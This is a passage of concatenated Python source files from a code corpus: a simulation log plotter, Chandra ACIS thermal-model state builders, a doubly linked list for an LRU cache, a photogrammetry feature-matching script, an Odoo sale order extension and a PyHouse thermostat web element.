plt.figure()\n            plt.subplot(1,2,1)\n            plot_slot_estimation(nodes_estimates, FLIERS)\n            plt.subplot(1,2,2)\n            plot_failed_slot_estimation(nodes_nfailures)\n            plt.tight_layout()\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot slot estimation\")\n\n        try:\n            plt.figure()  # added for consistency with the other plot groups\n            nodes_estimates = get_sim_epoch_estimates(log_data)\n            plot_epoch_estimates(nodes_estimates, FLIERS)\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot epoch estimations\")\n\n        try:\n            plt.figure()\n            nodes_sync, nodes_desync = get_sim_sync_counters(log_data)\n            plot_sync_counters(nodes_sync, nodes_desync)\n            plt.tight_layout()\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot sync counters\")\n\n        try:\n            plt.figure()\n            #plot_trx(log_data)\n            nodes_tx, nodes_rx = get_sim_flood_trx(log_data)\n            plot_flood_trx(nodes_tx, nodes_rx)\n            plt.tight_layout()\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot trx data\")\n\n        try:\n            nodes_nerr, nodes_nbad_pkt = get_sim_trx_errors(log_data)\n            error_details = get_sim_trx_error_details(log_data)\n            plt.figure()\n            plot_trx_errors(nodes_nerr, nodes_nbad_pkt)\n            plt.tight_layout()\n            pic_out(\"errors\")\n            plt.figure()\n            plot_trx_error_details(error_details)\n            plt.tight_layout()\n            pic_out(\"error_details\")\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot trx detailed errors\")\n        # -------------------------------------------------------------------------\n\n        if pdf_fh is not None:\n            pdf_fh.close()\n    except BaseException as e:\n        if pdf_fh is not None:\n            pdf_fh.close()\n        # remove any partial output; guard against the interactive case, where\n        # plot_output is None (the original crashed on os.path.isfile(None))\n        if plot_output is not None:\n            if os.path.isfile(plot_output):\n                os.remove(plot_output)\n            else:\n                shutil.rmtree(plot_output)\n        raise e\n
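\n# Added usage sketch (hypothetical paths): render one simulation log into a\n# multipage PDF next to the log file, overwriting any previous output:\n#\n#     plot_simulation_results(\"sim01\", \"logs/sim01.log\",\n#                             format_=\"pdf-multi\", overwrite=True)\n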
\nif __name__ == \"__main__\":\n    import argparse\n    import os\n    import sys\n\n    BASE_PATH = os.path.dirname(sys.argv[0])\n    # -------------------------------------------------------------------------\n    # PARSING ARGUMENTS\n    # -------------------------------------------------------------------------\n    parser = argparse.ArgumentParser()\n    # required arguments\n    parser.add_argument(\"log_source\",\\\n            help=\"The log file to analyse or the folder from which to start searching for logs\")\n    # optional args\n    parser.add_argument(\"-s\", \"--save-plots\",\\\n            nargs=\"?\",\\\n            const = True,\\\n            help=\"The directory where plot figures are saved.\")\n    parser.add_argument(\"-o\", \"--overwrite\",\\\n            nargs = \"?\",\\\n            const = True,\\\n            default = False,\\\n            help=\"Overwrite output files if already existing\")\n    parser.add_argument(\"-f\", \"--save-format\",\\\n            nargs = \"?\",\\\n            const = \"pdf-multi\",\\\n            default = \"pdf-multi\",\\\n            choices = [\"png\", \"pdf\", \"pdf-multi\"],\\\n            help=\"The format used when saving plots. Either PNG or PDF, single file or one file per page\")\n\n    args = parser.parse_args()\n    # -------------------------------------------------------------------------\n    # INPUT CHECKING\n    # -------------------------------------------------------------------------\n\n    # whether boxplots should show outliers (fliers); keep False for testbed data\n    FLIERS = False\n\n    format_ = args.save_format\n    if args.save_plots is True:\n        dest_folder = None\n    elif args.save_plots:\n\n        dest_folder = os.path.abspath(args.save_plots)\n        if not(os.path.exists(dest_folder) and os.path.isdir(dest_folder)):\n            os.mkdir(dest_folder)\n    else:\n        # if no saving, then save format must be None (force interactive plots)\n        dest_folder = None\n        format_ = None\n    # -------------------------------------------------------------------------\n\n    if os.path.isfile(args.log_source):\n        log_reg = re.compile(r\"(?:.*/)*(.*)\\.log$\")  # fixed: escape the dot in \".log\"\n        match = log_reg.match(args.log_source)\n        if match:\n            name = match.group(1)\n            plot_simulation_results(name, args.log_source, format_, dest_folder)\n        else:\n            raise ValueError(\"The file given is not a log file\")\n\n    elif os.path.isdir(args.log_source):\n\n        # avoid doing an interactive session in this case, even if asked (too\n        # many plots)\n        if format_ is None:\n            print(\"Interactive session unavailable when directories are given\")\n            sys.exit(0)\n\n        plots_done = 0\n        plots_undone = []\n        for sim_name, log_path in simulation_log_iter(args.log_source):\n            try:\n                plot_simulation_results(sim_name, log_path, format_, dest_folder, overwrite=args.overwrite)\n                plots_done += 1\n            except DAException as e:\n                # data analysis exceptions are important, don't skip them\n                raise e\n            except Exception:\n                logger.error(\"Invalid log found. 
Skipped: {}\".format(log_path))\n plots_undone.append(log_path)\n print(\"-\"*40)\n print(\"{} simulations successfully processed\".format(plots_done))\n print(\"{} simulations haven't been processed due to errors\".format(len(plots_undone)))\n print(\"-\"*40)\n if len(plots_undone) > 0:\n print(\"Bad logs:\\n\" + \"-\"*40)\n for badlog in plots_undone:\n print(badlog)\n\n","sub_path":"apps/glossy-test/test_tools/analysis/sim_visualiser.py","file_name":"sim_visualiser.py","file_ext":"py","file_size_in_byte":21752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611935109","text":"import os\nimport Ska.DBI\nfrom Chandra.Time import DateTime\nfrom pprint import pformat\nimport Chandra.cmd_states as cmd_states\nimport logging\nfrom Ska.File import get_globfiles\n\n\nclass StateBuilder(object):\n \"\"\"\n This is the base class for all StateBuilder objects. It\n should not be used by itself, but subclassed.\n \"\"\"\n def __init__(self, logger=None):\n if logger is None:\n # Make a logger but with no output\n logger = logging.getLogger('statebuilder-no-logger')\n self.logger = logger\n\n def get_prediction_states(self, tlm):\n \"\"\"\n Get the states used for the thermal prediction.\n\n Parameters\n ----------\n tlm : dictionary\n Dictionary containg temperature and other telemetry\n \"\"\"\n raise NotImplementedError(\"'StateBuilder should be subclassed!\")\n\n def _get_bs_cmds(self):\n \"\"\"\n Internal method used to obtain commands from the backstop \n file and store them.\n \"\"\"\n import Ska.ParseCM\n if os.path.isdir(self.backstop_file):\n # Returns a list but requires exactly 1 match\n backstop_file = get_globfiles(os.path.join(self.backstop_file,\n 'CR*.backstop'))[0]\n else:\n backstop_file = self.backstop_file\n self.logger.info('Using backstop file %s' % backstop_file)\n bs_cmds = Ska.ParseCM.read_backstop(backstop_file)\n self.logger.info('Found %d backstop commands between %s and %s' %\n (len(bs_cmds), bs_cmds[0]['date'], bs_cmds[-1]['date']))\n self.bs_cmds = bs_cmds\n self.tstart = bs_cmds[0]['time']\n self.tstop = bs_cmds[-1]['time']\n\n def get_validation_states(self, datestart, datestop):\n \"\"\"\n Get states for validation of the thermal model.\n\n Parameters\n ----------\n datestart : string\n The start date to grab states afterward.\n datestop : string\n The end date to grab states before.\n \"\"\"\n datestart = DateTime(datestart).date\n datestop = DateTime(datestop).date\n self.logger.info('Getting commanded states between %s - %s' %\n (datestart, datestop))\n\n # Get all states that intersect specified date range\n cmd = \"\"\"SELECT * FROM cmd_states\n WHERE datestop > '%s' AND datestart < '%s'\n ORDER BY datestart\"\"\" % (datestart, datestop)\n self.logger.debug('Query command: %s' % cmd)\n states = self.db.fetchall(cmd)\n self.logger.info('Found %d commanded states' % len(states))\n\n # Set start and end state date/times to match telemetry span. Extend the\n # state durations by a small amount because of a precision issue converting\n # to date and back to secs. 
(The reference tstop could be just over the\n # 0.001 precision of date and thus cause an out-of-bounds error when\n # interpolating state values).\n states[0].tstart = DateTime(datestart).secs - 0.01\n states[0].datestart = DateTime(states[0].tstart).date\n states[-1].tstop = DateTime(datestop).secs + 0.01\n states[-1].datestop = DateTime(states[-1].tstop).date\n\n return states\n\n\nclass SQLStateBuilder(StateBuilder):\n \"\"\"\n The SQLStateBuilder contains the original code used to \n obtain commanded states for prediction and validation of\n a thermal model for a particular command load. It can also\n be used for validation only.\n \"\"\"\n def __init__(self, interrupt=False, backstop_file=None, \n logger=None):\n \"\"\"\n Give the SQLStateBuilder arguments that were passed in \n from the command line, and set up the connection to the \n commanded states database.\n\n Parameters\n ----------\n interrupt : boolean\n If True, this is an interrupt load.\n backstop_file : string\n Path to the backstop file. If a directory, the backstop \n file will be searched for within this directory.\n logger : Logger object, optional\n The Python Logger object to be used when logging.\n \"\"\"\n super(SQLStateBuilder, self).__init__(logger=logger)\n self.interrupt = interrupt\n self.backstop_file = backstop_file\n # Connect to database \n server = os.path.join(os.environ['SKA'], 'data', 'cmd_states', 'cmd_states.db3')\n self.logger.info('Connecting to {} to get cmd_states'.format(server))\n self.db = Ska.DBI.DBI(dbi=\"sqlite\", server=server, user='aca_read',\n database='aca')\n if self.backstop_file is not None:\n self._get_bs_cmds()\n#\n# REMOVED _get_bs_cmds call from this location (01/19/2018)\n# Moved the method to the Base class.\n\n def get_prediction_states(self, tbegin):\n \"\"\"\n Get the states used for the prediction.\n\n Parameters\n ----------\n tbegin : string\n The starting date/time from which to obtain states for\n prediction.\n \"\"\"\n\n \"\"\"\n Get state0 as last cmd_state that starts within available telemetry. \n The original logic in get_state0() is to return a state that\n is absolutely, positively reliable by insisting that the\n returned state is at least ``date_margin`` days old, where the\n default is 10 days. 
That is too conservative (given the way\n commanded states are actually managed) and not what is desired\n here, which is a recent state from which to start thermal propagation.\n\n Instead we supply ``date_margin=None`` so that get_state0 will\n find the newest state consistent with the ``date`` criterion\n and pcad_mode == 'NPNT'.\n \"\"\"\n\n state0 = cmd_states.get_state0(tbegin, self.db, datepar='datestart',\n date_margin=None)\n\n self.logger.debug('state0 at %s is\\n%s' % (DateTime(state0['tstart']).date,\n pformat(state0)))\n\n # Get commands after end of state0 through first backstop command time\n cmds_datestart = state0['datestop']\n cmds_datestop = self.bs_cmds[0]['date']\n\n # Get timeline load segments including state0 and beyond.\n timeline_loads = self.db.fetchall(\"\"\"SELECT * from timeline_loads\n WHERE datestop >= '%s'\n and datestart < '%s'\"\"\"\n % (cmds_datestart, cmds_datestop))\n self.logger.info('Found {} timeline_loads after {}'.format(\n len(timeline_loads), cmds_datestart))\n\n # Get cmds since datestart within timeline_loads\n db_cmds = cmd_states.get_cmds(cmds_datestart, db=self.db, update_db=False,\n timeline_loads=timeline_loads)\n\n # Delete non-load cmds that are within the backstop time span\n # => Keep if timeline_id is not None (if a normal load)\n # or date < bs_cmds[0]['time']\n\n # If this is an interrupt load, we don't want to include the end \n # commands from the continuity load since not all of them will be valid,\n # and we could end up evolving on states which would not be present in \n # the load under review. However, once the load has been approved and is\n # running / has run on the spacecraft, the states in the database will \n # be correct, and we will want to include all relevant commands from the\n # continuity load. To check for this, we find the current time and see \n # the load under review is still in the future. If it is, we then treat\n # this as an interrupt if requested, otherwise, we don't. \n current_time = DateTime().secs\n interrupt = self.interrupt and self.bs_cmds[0][\"time\"] > current_time\n\n db_cmds = [x for x in db_cmds\n if ((x['timeline_id'] is not None and not interrupt) or\n x['time'] < self.bs_cmds[0]['time'])]\n\n self.logger.info('Got %d cmds from database between %s and %s' %\n (len(db_cmds), cmds_datestart, cmds_datestop))\n\n # Get the commanded states from state0 through the end of backstop commands\n states = cmd_states.get_states(state0, db_cmds + self.bs_cmds)\n states[-1].datestop = self.bs_cmds[-1]['date']\n states[-1].tstop = self.bs_cmds[-1]['time']\n self.logger.info('Found %d commanded states from %s to %s' %\n (len(states), states[0]['datestart'], \n states[-1]['datestop']))\n\n return states, state0\n\n\n#-------------------------------------------------------------------------------\n# ACIS Ops Load History assembly \n#-------------------------------------------------------------------------------\nclass ACISStateBuilder(StateBuilder):\n\n def __init__(self, interrupt=False, backstop_file=None, nlet_file=None, \n logger=None):\n \"\"\"\n Give the ACISStateBuilder arguments that were passed in \n from the command line, and set up the connection to the \n commanded states database. \n\n Parameters\n ----------\n interrupt : boolean\n If True, this is an interrupt load.\n backstop_file : string\n Path to the backstop file. 
If a directory, the backstop \n file will be searched for within this directory.\n nlet_file : string\n full path to the Non-Load Event Tracking file\n logger : Logger object, optional\n The Python Logger object to be used when logging.\n \"\"\"\n # Import the BackstopHistory class\n from backstop_history import BackstopHistory\n\n # Capture the full path to the NLET file to be used\n self.nlet_file = nlet_file\n\n # Create an instance of the Backstop Command class\n self.BSC = BackstopHistory.BackstopHistory('ACIS-Continuity.txt', self.nlet_file)\n\n # The Review Load backstop name\n self.rev_bs_name = None\n # Normally I would have created the self.rev_bs_cmds attribute\n # and used that however to work with ATC I changed it to bs_cmds.\n\n super(ACISStateBuilder, self).__init__(logger=logger)\n self.interrupt = interrupt\n self.backstop_file = backstop_file\n\n # if the user supplied a full path to the backstop file then\n # capture the backstop file name and the commands within the backstop file.\n if backstop_file is not None:\n # Get tstart, tstop, commands from backstop file in args.oflsdir\n # These are the REVIEW backstop commands.\n # NOTE: This method takes every command. it does not eliminate\n # commands that are not of interest as sot/cmd_states/get_cmds does.\n rev_bs_cmds, self.rev_bs_name = self.BSC.get_bs_cmds(self.backstop_file)\n\n # Store the Review Load backstop commands in the class attribute and\n # also capture the Review load time of first command (TOFC) and\n # Time of Last Command (TOLC).\n self.bs_cmds = rev_bs_cmds\n self.tstart = rev_bs_cmds[0]['time']\n self.tstop = rev_bs_cmds[-1]['time']\n\n # Connect to database (NEED TO USE aca_read for sybase; user is ignored for sqlite)\n # We only need this as the quick way to get the validation states.\n server = os.path.join(os.environ['SKA'], 'data', 'cmd_states', 'cmd_states.db3')\n self.logger.info('Connecting to {} to get cmd_states'.format(server))\n self.db = Ska.DBI.DBI(dbi=\"sqlite\", server=server, user='aca_read',\n database='aca')\n\n def get_prediction_states(self, tbegin):\n \"\"\"\n Get the states used for the prediction. This includes both the\n states from the review load backstop file and all the \n states between the latest telemetry data and the beginning \n of that review load backstop file.\n\n The Review Backstop commands already obtained.\n Telemtry from 21 days back to the latest in Ska obtained.\n\n So now the task is to backchain through the loads and assemble\n any states missing between the end of telemetry through the start\n of the review load.\n\n Parameters\n ----------\n tbegin : string\n The starting date/time from which to obtain states for\n prediction. This is tlm['date'][-5]) or, in other words, the\n date used is 5 enteries back from the end of the fetched telemetry\n \"\"\"\n\n \"\"\"\n Get state0 as last cmd_state that starts within available telemetry. \n The original logic in get_state0() is to return a state that\n is absolutely, positively reliable by insisting that the\n returned state is at least ``date_margin`` days old, where the\n default is 10 days. 
That is too conservative (given the way\n commanded states are actually managed) and not what is desired\n here, which is a recent state from which to start thermal propagation.\n\n Instead we supply ``date_margin=None`` so that get_state0 will\n find the newest state consistent with the ``date`` criterion\n and pcad_mode == 'NPNT'.\n \"\"\"\n # If an OFLS directory has been specified, get the backstop commands\n # stored in the backstop file in that directory\n\n # Ok ready to start the collection of continuity commands\n #\n # Make a copy of the Review Load Commands. This will have \n # Continuity commands concatenated to it and will be the final product\n\n import copy\n\n bs_cmds = copy.copy(self.bs_cmds)\n bs_start_time = bs_cmds[0]['time']\n present_ofls_dir = copy.copy(self.backstop_file)\n\n # So long as the earliest command in bs_cmds is after the state0\n # time, keep concatenating continuity commands to bs_cmds based upon\n # the type of load.\n # Note that as you march back in time along the load chain, \"ofls_dir\" will change.\n\n # First we need a State0 because cmd_states.get_states cannot translate\n # backstop commands into commanded states without one. cmd_states.get_state0\n # is written such that if you don't give it a database object it will \n # create one for itself and use that. Here, all that really matters \n # is the value of 'tbegin', the specification of the date parameter to be used\n # and the date_margin.\n state0 = cmd_states.get_state0(tbegin, self.db, datepar='datestart',\n date_margin=None)\n # WHILE\n # The big while loop that backchains through previous loads and concatenates the\n # proper load sections to the review load.\n while state0['tstart'] < bs_start_time:\n\n # Read the Continuity information of the present ofls directory\n cont_load_path, present_load_type, scs107_date = self.BSC.get_continuity_file_info(present_ofls_dir)\n\n #---------------------- NORMAL ----------------------------------------\n # If the load type is \"normal\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n if present_load_type.upper() == 'NORMAL':\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n # Combine the continuity commands with the bs_cmds\n bs_cmds = self.BSC.CombineNormal(cont_bs_cmds, bs_cmds)\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n #---------------------- TOO ----------------------------------------\n # If the load type is \"too\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n elif present_load_type.upper() == 'TOO':\n # Obtain the continuity load commands\n cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n # Combine the continuity commands with the bs_cmds\n bs_cmds = self.BSC.CombineTOO(cont_bs_cmds, bs_cmds)\n\n # Reset the backstop collection start time for the While loop\n bs_start_time = bs_cmds[0]['time']\n # Now point the operative ofls directory to the Continuity directory\n present_ofls_dir = cont_load_path\n\n #---------------------- STOP ----------------------------------------\n # If the load type is \"STOP\" then grab the continuity command\n # set and concatenate those commands to the start of bs_cmds\n # Take into account the SCS-107 commands which shut ACIS down\n # and any LTCTI run\n elif 
present_load_type.upper() == 'STOP':\n\n                # Obtain the continuity load commands\n                cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n\n                # CombineSTOP the continuity commands with the bs_cmds\n                bs_cmds = self.BSC.CombineSTOP(cont_bs_cmds, bs_cmds, scs107_date)\n\n                # Reset the backstop collection start time for the While loop\n                bs_start_time = bs_cmds[0]['time']\n                # Now point the operative ofls directory to the Continuity directory\n                present_ofls_dir = cont_load_path\n\n            #---------------------- SCS-107 ----------------------------------------\n            # If the load type is \"SCS-107\" then grab the continuity command set\n            # plus the continuity load's vehicle-only commands, and concatenate\n            # them to the start of bs_cmds, taking into account the SCS-107\n            # commands which shut ACIS down and any LTCTI run\n            elif present_load_type.upper() == 'SCS-107':\n                # Obtain the continuity load commands\n                cont_bs_cmds, cont_bs_name = self.BSC.get_bs_cmds(cont_load_path)\n                # Store the continuity bs commands as a chunk in the chunk list\n\n                # Obtain the CONTINUITY load Vehicle-Only file\n                vo_bs_cmds, vo_bs_name = self.BSC.get_vehicle_only_bs_cmds(cont_load_path)\n\n                # Combine107 the continuity commands with the bs_cmds\n                bs_cmds = self.BSC.Combine107(cont_bs_cmds, vo_bs_cmds, bs_cmds, scs107_date)\n\n                # Reset the backstop collection start time for the While loop\n                bs_start_time = bs_cmds[0]['time']\n                # Now point the operative ofls directory to the Continuity directory\n                present_ofls_dir = cont_load_path\n\n        # Convert the assembled backstop command history into commanded states\n        # from state0 through the end of the Review Load backstop commands.\n        # get_states trims the list to any command whose time is AFTER the state0 START\n        # time and then converts each relevant backstop command, in that resultant list,\n        # into a pseudo-commanded states state\n        states = cmd_states.get_states(state0, bs_cmds)\n\n        # Get rid of the 2099 placeholder stop date\n        states[-1].datestop = bs_cmds[-1]['date']\n        states[-1].tstop = bs_cmds[-1]['time']\n\n        self.logger.debug('state0 at %s is\\n%s' % (DateTime(state0['tstart']).date,\n                                                   pformat(state0)))\n\n        return states, state0\n\n\nstate_builders = {\"sql\": SQLStateBuilder,\n                  \"acis\": ACISStateBuilder}\n","sub_path":"acis_thermal_check/state_builder.py","file_name":"state_builder.py","file_ext":"py","file_size_in_byte":19851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
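# --- Added sketch (plain Python, not part of the surrounding records) ---
# The ACIS "backchaining" loop above, reduced to its core: keep prepending the
# continuity load's commands until the assembled history reaches the start of
# state0. The helper names (get_continuity_dir, get_load_cmds) are hypothetical
# stand-ins for the BackstopHistory calls used in the real code.
def assemble_history(ofls_dir, state0_tstart, get_continuity_dir, get_load_cmds):
    cmds = get_load_cmds(ofls_dir)
    while cmds[0]['time'] > state0_tstart:
        ofls_dir = get_continuity_dir(ofls_dir)   # step one load back in time
        cmds = get_load_cmds(ofls_dir) + cmds     # prepend the older commands
    return cmds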
self.last is None:\n self.last = new_node\n self.first = new_node\n self.len += 1\n else:\n # insert_after already updates self.len\n self.insert_after(self.last, new_node)\n \n def remove(self, node):\n if node.prev is None:\n self.first = node.next\n else:\n node.prev.next = node.next\n \n if node.next is None:\n self.last = node.prev\n else:\n node.next.prev = node.prev\n self.len -= 1\n \n def display(self):\n current = self.first\n while current:\n print(current.data, end = ' ')\n current = current.next\n\n def to_list(self): # return a python list with the elements of the doubly-linked list\n res = []\n curr = self.first\n while curr is not None:\n res.append(curr.data) # nodes store their payload in .data\n curr = curr.next\n return res\n\n def is_empty(self): # check whether the list is empty\n return self.len == 0\n\nclass Node:\n def __init__(self, next=None, prev=None, data=None):\n self.next = next # reference to next node in DLL \n self.prev = prev # reference to previous node in DLL \n self.data = data\n\n def __hash__(self):\n # identity-based hash: distinct nodes stay distinct even with equal data\n return id(self)\n\n def __str__(self):\n return str(self.data)","sub_path":"lru_cache/lru_cache/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530027645","text":"#!/usr/bin/python3\n\nimport argparse\nimport pickle\nimport numpy as np\nimport os\n\nfrom props import getNode\n\nfrom lib import Matcher\nfrom lib import Pose\nfrom lib import ProjectMgr\nfrom lib import SRTM\n\n# working on matching features ...\ndef match(project_dir, matching_options):\n\n \n matcher = matching_options[0]\n match_ratio = matching_options[1]\n min_pairs = matching_options[2]\n min_dist = matching_options[3]\n max_dist = matching_options[4]\n filters = matching_options[5]\n min_chain_length = matching_options[6]\n\n proj = ProjectMgr.ProjectMgr(project_dir)\n proj.load_images_info()\n proj.load_features(descriptors=False) # descriptors cached on the fly later\n proj.undistort_keypoints()\n proj.load_match_pairs()\n\n matcher_node = getNode('/config/matcher', True)\n matcher_node.setString('matcher', matcher)\n matcher_node.setFloat('match_ratio', match_ratio)\n matcher_node.setString('filter', filters)\n matcher_node.setInt('min_pairs', min_pairs)\n matcher_node.setFloat('min_dist', min_dist)\n matcher_node.setFloat('max_dist', max_dist)\n matcher_node.setInt('min_chain_len', min_chain_length)\n\n # save any config changes\n proj.save()\n\n # camera calibration\n K = proj.cam.get_K()\n print(\"K:\", K)\n\n # fire up the matcher\n m = Matcher.Matcher()\n m.configure()\n m.robustGroupMatches(proj.image_list, K,\n filter=filters, review=False)\n\n # The following code is deprecated ...\n do_old_match_consolidation = False\n if do_old_match_consolidation:\n # build a list of all 'unique' keypoints. 
Include an index to each\n # containing image and feature.\n matches_dict = {}\n for i, i1 in enumerate(proj.image_list):\n for j, matches in enumerate(i1.match_list):\n if j > i:\n for pair in matches:\n key = \"%d-%d\" % (i, pair[0])\n m1 = [i, pair[0]]\n m2 = [j, pair[1]]\n if key in matches_dict:\n feature_dict = matches_dict[key]\n feature_dict['pts'].append(m2)\n else:\n feature_dict = {}\n feature_dict['pts'] = [m1, m2]\n matches_dict[key] = feature_dict\n #print match_dict\n count = 0.0\n sum = 0.0\n for key in matches_dict:\n sum += len(matches_dict[key]['pts'])\n count += 1\n if count > 0.1:\n print(\"total unique features in image set = %d\" % count)\n print(\"kp average instances = %.4f\" % (sum / count))\n\n # compute an initial guess at the 3d location of each unique feature\n # by averaging the locations of each projection\n for key in matches_dict:\n feature_dict = matches_dict[key]\n sum = np.array( [0.0, 0.0, 0.0] )\n for p in feature_dict['pts']:\n sum += proj.image_list[ p[0] ].coord_list[ p[1] ]\n ned = sum / len(feature_dict['pts'])\n feature_dict['ned'] = ned.tolist()\n\n def update_match_location(match):\n sum = np.array( [0.0, 0.0, 0.0] )\n for p in match[1:]:\n # print proj.image_list[ p[0] ].coord_list[ p[1] ]\n sum += proj.image_list[ p[0] ].coord_list[ p[1] ]\n ned = sum / len(match[1:])\n # print \"avg =\", ned\n match[0] = ned.tolist()\n return match\n\n if False:\n print(\"Constructing unified match structure...\")\n print(\"This probably will fail because we didn't do the ground intersection at the start...\")\n matches_direct = []\n for i, image in enumerate(proj.image_list):\n # print image.name\n for j, matches in enumerate(image.match_list):\n # print proj.image_list[j].name\n if j > i:\n for pair in matches:\n match = []\n # ned place holder\n match.append([0.0, 0.0, 0.0])\n match.append([i, pair[0]])\n match.append([j, pair[1]])\n update_match_location(match)\n matches_direct.append(match)\n # print pair, match\n\n print(\"Writing match file ...\")\n pickle.dump(matches_direct, open(project_dir + \"/matches_direct\", \"wb\"))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Keypoint projection.')\n parser.add_argument('--project', required=True, help='project directory')\n parser.add_argument('--matcher', default='FLANN',\n choices=['FLANN', 'BF'])\n parser.add_argument('--match-ratio', default=0.75, type=float,\n help='match ratio')\n parser.add_argument('--min-pairs', default=25, type=int,\n help='minimum matches between image pairs to keep')\n parser.add_argument('--min-dist', default=0, type=float,\n help='minimum 2d camera distance for pair comparison')\n parser.add_argument('--max-dist', default=75, type=float,\n help='maximum 2d camera distance for pair comparison')\n parser.add_argument('--filter', default='gms',\n choices=['gms', 'homography', 'fundamental', 'essential', 'none'])\n parser.add_argument('--min-chain-length', type=int, default=3, help='minimum match chain length (3 recommended)')\n #parser.add_argument('--ground', type=float, help='ground elevation in meters')\n\n args = parser.parse_args()\n\n # order must match the unpacking at the top of match()\n matching_options = [args.matcher, args.match_ratio, args.min_pairs, args.min_dist,\n args.max_dist, args.filter, args.min_chain_length]\n \n match(args.project, matching_options)\n","sub_path":"scripts/4a_matching.py","file_name":"4a_matching.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155823610","text":"from 
openerp import models, fields, api\r\n\r\nclass sale_order_wysiwyg(models.Model):\r\n _inherit = 'sale.order'\r\n \r\n footer_text = fields.Html(string=\"Footer text\")\r\n\r\n @api.multi\r\n def print_online_quotation(self):\r\n url = '/quote/' + str(self.id) + '?pdf=True'\r\n return {\r\n 'name' : 'Go to website',\r\n 'res_model': 'ir.actions.act_url',\r\n 'type' : 'ir.actions.act_url',\r\n 'target' : 'new',\r\n 'url' : url\r\n }\r\n","sub_path":"sale_wysiwyg_online_quote/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"306238579","text":"\"\"\"\n-*- _test-case-name: PyHouse.src.Modules.Web._test.test_web_thermostats -*-\n\n@name: PyHouse/src/Modules/Web/web_thermostats.py\n@author: D. Brian Kimmel\n@contact: D.BrianKimmel@gmail.com\n@copyright: (c) 2014-2017 by D. Brian Kimmel\n@license: MIT License\n@note: Created on Jul 1, 2014\n@summary: Handle the Thermostat information for a house.\n\n\"\"\"\n\n__updated__ = '2017-01-27'\n\n# Import system type stuff\nimport os\nfrom nevow import athena\nfrom nevow import loaders\n\n# Import PyMh files and modules.\nfrom Modules.Core.data_objects import ThermostatData\nfrom Modules.Computer.Web import web_family, web_utils\nfrom Modules.Computer.Web.web_utils import GetJSONHouseInfo\nfrom Modules.Core.Utilities import json_tools\nfrom Modules.Core import logging_pyh as Logger\nLOG = Logger.getLogger('PyHouse.webThermost ')\n\n# Handy helper for finding external resources nearby.\nwebpath = os.path.join(os.path.split(__file__)[0])\ntemplatepath = os.path.join(webpath, 'template')\n\n\nclass ThermostatsElement(athena.LiveElement):\n \"\"\" a 'live' thermostat element.\n \"\"\"\n docFactory = loaders.xmlfile(os.path.join(templatepath, 'thermostatElement.html'))\n jsClass = u'thermostats.ThermostatsWidget'\n\n def __init__(self, p_workspace_obj, _p_params):\n self.m_workspace_obj = p_workspace_obj\n self.m_pyhouse_obj = p_workspace_obj.m_pyhouse_obj\n\n @athena.expose\n def getHouseData(self):\n l_json = GetJSONHouseInfo(self.m_pyhouse_obj)\n return l_json\n\n @athena.expose\n def saveThermostatsData(self, p_json):\n \"\"\"Thermostat data is returned, so update the info.\n \"\"\"\n l_json = json_tools.decode_json_unicode(p_json)\n l_delete = l_json['Delete']\n l_ix = int(l_json['Key'])\n if l_delete:\n try:\n del self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix]\n except AttributeError:\n LOG.error(\"web_thermostats - Failed to delete - JSON: {}\".format(l_json))\n return\n try:\n l_obj = self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix]\n except KeyError:\n LOG.warning('Creating a new Thermostat for Key:{}'.format(l_ix))\n l_obj = ThermostatData()\n #\n web_utils.get_base_info(l_obj, l_json)\n l_obj.Comment = l_json['Comment']\n l_obj.CoolSetPoint = l_json['CoolSetPoint']\n l_obj.CurrentTemperature = 0\n l_obj.DeviceFamily = l_json['DeviceFamily']\n l_obj.DeviceSubType = 1\n l_obj.DeviceType = 2\n l_obj.HeatSetPoint = l_json['HeatSetPoint']\n l_obj.ThermostatMode = 'Auto' # Cool | Heat | Auto | EHeat\n l_obj.ThermostatScale = 'F' # F | C\n l_obj.ThermostatStatus = 'Off'\n web_family.get_family_json_data(l_obj, l_json)\n web_utils.get_room_info(l_obj, l_json)\n self.m_pyhouse_obj.House.Hvac.Thermostats[l_ix] = l_obj # Put into internal data store\n LOG.info('Thermostat Added - {}'.format(l_obj.Name))\n\n# ## END 
